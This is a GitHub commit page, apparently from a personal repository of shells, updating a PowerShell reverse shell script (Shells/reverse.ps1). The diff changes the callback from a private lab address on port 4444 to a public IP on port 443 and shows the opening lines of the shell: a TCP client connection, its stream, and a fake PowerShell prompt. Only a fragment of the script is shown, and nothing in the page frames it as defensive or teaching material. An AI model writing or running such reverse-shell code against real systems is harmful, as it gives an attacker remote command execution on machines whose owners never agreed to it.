Skip to content

Commit

Permalink
Update reverse.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
adon90 committed Mar 4, 2021
1 parent e334cf6 commit 5b65dca
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Shells/reverse.ps1
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
$client = New-Object System.Net.Sockets.TCPClient("192.168.61.129",4444);
$client = New-Object System.Net.Sockets.TCPClient("37.187.112.19",443);
$stream = $client.GetStream();

$greeting = "PS " + (pwd).Path + "> ";
Expand Down

0 comments on commit 5b65dca

Please sign in to comment.